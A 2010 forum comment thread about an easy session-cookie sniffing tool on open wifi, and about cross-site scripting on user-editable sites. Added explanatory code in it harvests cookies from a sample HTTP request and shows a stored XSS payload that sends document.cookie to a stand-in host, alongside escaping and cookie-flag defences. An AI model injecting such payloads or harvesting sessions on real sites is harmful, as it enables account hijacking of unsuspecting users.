[personal profile] pne 2010-10-28 06:59 am (UTC)
I'd replace "(wireless)" with "(usually wireless)" or something like that - the attack would work equally well in, say, a company where there are lots of people on the local LAN.

(Or, theoretically, at home, but there LANs usually only connect a single-figure number of computers, typically under the control of people you know and have some level of trust with.)

Ditto on the "this isn't new in principle, it just got easier and more idiot-proof (script-kiddie enabled)", though.

[identity profile] silver-chipmunk.livejournal.com 2010-10-27 05:55 pm (UTC)
Holy crap! Thanks for posting this!

[identity profile] prezzey.livejournal.com 2010-10-27 06:20 pm (UTC)
In practice IMO it's only dangerous if you are on an open wifi network (or a LAN where you do not trust all the computers physically connected to the network - I've been in that situation) and you transmit sensitive information unencrypted. Which is something you should not do, anyway. There are people who run open wifi networks only to capture the data of people using their hotspot.

This thing just grabs cookies but there are tools which grab everything and you can cherry-pick. I think the key attraction here is that this piece of software does not require much by way of technical expertise.
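
As an added illustration of what "just grabs cookies" means (example code, not part of the thread and not the tool being discussed): a passive sniffer on an open wifi or an untrusted LAN sees every cleartext HTTP request, and a session cookie is just one header in it. The captured request, host name and cookie names below are constructed for the example. The last function is the check a site operator would want: a cookie set without the `Secure` attribute is sent over plain HTTP and is therefore exposed to exactly this kind of capture.

```javascript
// Added example, not from the original thread. The "capture" is a
// constructed cleartext HTTP request; host and cookie names are made up.

const CAPTURED_HTTP_REQUEST = [
  'GET /inbox HTTP/1.1',
  'Host: mail.example.com',
  'User-Agent: Mozilla/5.0',
  'Cookie: lang=en; sessionid=7f3a9c0d2e4b; csrftoken=abc123',
  'Accept: text/html',
  '',
  '',
].join('\r\n');

// Parse the request line and headers out of a cleartext HTTP request.
function parseHttpRequest(raw) {
  const [head] = raw.split('\r\n\r\n');
  const lines = head.split('\r\n');
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, path, headers };
}

// Split a Cookie header into name/value pairs.
function parseCookieHeader(value) {
  const cookies = {};
  for (const part of value.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    cookies[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// What the sniffer is after: the host plus every cookie sent to it,
// which is enough to replay the victim's session from another machine.
function harvestSession(raw) {
  const req = parseHttpRequest(raw);
  const cookieHeader = req.headers['cookie'];
  return {
    host: req.headers['host'],
    cookies: cookieHeader ? parseCookieHeader(cookieHeader) : {},
  };
}

// Defender's check on a Set-Cookie header: without `Secure` the browser
// will send the cookie over cleartext HTTP, so it is sniffable.
function auditSetCookie(setCookieValue) {
  const [pair, ...attrs] = setCookieValue.split(';').map((s) => s.trim());
  const name = pair.slice(0, pair.indexOf('='));
  const flags = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return {
    name,
    secure: flags.has('secure'),
    httpOnly: flags.has('httponly'),
    exposedToSniffing: !flags.has('secure'),
  };
}

console.log(harvestSession(CAPTURED_HTTP_REQUEST));
console.log(auditSetCookie('sessionid=7f3a9c0d2e4b; Path=/'));
console.log(auditSetCookie('sessionid=7f3a9c0d2e4b; Path=/; Secure; HttpOnly'));
```

Nothing here requires any cleverness on the attacker's side, which is the point made in the thread: the parsing is trivial, and the only thing that stops it is the site never sending the session cookie in the clear (HTTPS throughout, plus `Secure` on the cookie).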

[identity profile] dandelion.livejournal.com 2010-10-27 07:02 pm (UTC)
It doesn't sound all that different to ordinary cookie-grabbing on sites like Neopets. The only scary part is it can now be done by people with very little technical knowledge (which widens the field of potential abusers significantly).

[personal profile] siderea 2010-10-27 07:34 pm (UTC)
"ordinary cookie-grabbing on sites like Neopets"?

[personal profile] siderea 2010-10-27 09:03 pm (UTC)
Yes, but how is the CGing done? Do you guys have a convenient App For That?

[identity profile] dandelion.livejournal.com 2010-10-27 09:43 pm (UTC)
No, hence why it's limited to people with some technical experience; it's done by inserting fairly freely-available Javascript into user-editable areas. Each time it's happened, more of the areas have been sanitised but people are quite creative.

[personal profile] siderea 2010-10-27 09:53 pm (UTC)
Ah! The technical term for that is a "Cross-site Scripting Attack", or XSS for short. LJ has had its own problems with those.
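
An added example of the XSS case described above (not code from the thread or from any of the sites mentioned): "inserting JavaScript into user-editable areas" is a stored cross-site scripting attack, and "sanitising" those areas means, at minimum, HTML-escaping what the user typed before it goes into the page. The profile text and the collector URL are made up for the example.

```javascript
// Added example, not from the original thread. The user text and the
// collector URL are constructed; nothing here is a real payload seen anywhere.

// What an attacker pastes into a user-editable field: a script that ships
// document.cookie off to a host they control.
const USER_PROFILE_TEXT =
  'hi! <script>new Image().src="http://collector.example/?c="+document.cookie</script>';

// Vulnerable render: user text dropped straight into the page markup.
function renderProfileUnsafe(text) {
  return '<div class="profile">' + text + '</div>';
}

// Escape the characters that let text break out of an HTML text node or
// attribute. Ampersand goes first so the later replacements are not
// re-escaped. The output is literal text, never markup.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened render: same template, user text escaped on output.
function renderProfileSafe(text) {
  return '<div class="profile">' + escapeHtml(text) + '</div>';
}

// Crude check used only to show the difference between the two renders
// (this is not a general XSS detector).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log(containsScriptTag(renderProfileUnsafe(USER_PROFILE_TEXT))); // true
console.log(containsScriptTag(renderProfileSafe(USER_PROFILE_TEXT)));   // false
```

Two caveats a practitioner would add. Escaping has to happen on output, for every context the text lands in (HTML body, attribute, URL, script), which is why each new "creative" spot the thread mentions needs its own fix; and marking the session cookie `HttpOnly` keeps it out of `document.cookie`, so even a script that does slip through cannot read it. That is defence in depth, not a substitute for escaping.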

[identity profile] pne.livejournal.com 2010-10-28 08:15 am (UTC)
The only scary part is it can now be done by people with very little technical knowledge

This.

[personal profile] siderea 2010-10-27 07:35 pm (UTC)
See my post if you haven't.